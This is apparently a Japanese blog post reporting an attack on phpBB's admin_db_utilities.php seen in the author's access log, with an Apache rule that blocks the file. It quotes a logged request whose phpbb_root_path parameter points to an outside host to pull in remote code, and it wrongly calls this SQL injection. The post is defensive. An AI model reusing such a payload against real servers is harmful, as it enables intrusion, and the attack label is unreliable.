|
|
この php スクリプトは、 phpBB なる掲示板に含まれているモヨウ。
もちろん、phpBB が原因でわなく、admin_db_utilities.php の脆弱性を狙って良からぬ 事をしようと悪事を働く不埒な輩の悪巧みが原因でつ。
きっと、SQL Injection の一種なのでしょう。
Attack 用の Exploit code が出回っているラシク、script kiddy が一生懸命実行してそうな感じです。
access_log 見てみると、"libwww-perl/5.803" とか入ってるし。
まづわ、 log をご覧あれい。
| 164.41.101.38 - - [02/Sep/2008:02:00:18 +0900] "GET /cgi-bin/scu3_diary//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 13255 "-" "libwww-perl/5.803" |
IP アドレスを whois してみたら cctld は UY でつた。
UY をさらに調べてみると・・・・República Oriental del Uruguay.
南米だよね・・・?ウルグアイ。
初めてみたよ。
っつーワケでさっさとアクセス拒否するなり、制限するなりするが良かろう。
admin_db_utilities.php を拒否すればよいだけ。
|
<Files "admin_db_utilities.php"> order deny,allow deny from all </Files> |
これで ok.
暫く様子を見てみてくらさい。
時々 access_log を見て該当のリクエストに対して status code 403 をレスポンスしているのを確認しませう。
phpDB を使っている場合、 deny from all しちゃうと、管理できなくなりそーなので、 適宜 allow from xxx.xxx.xxx.xxx を入れて許可する定義もしておけばよろしかろうと 思いまつ。
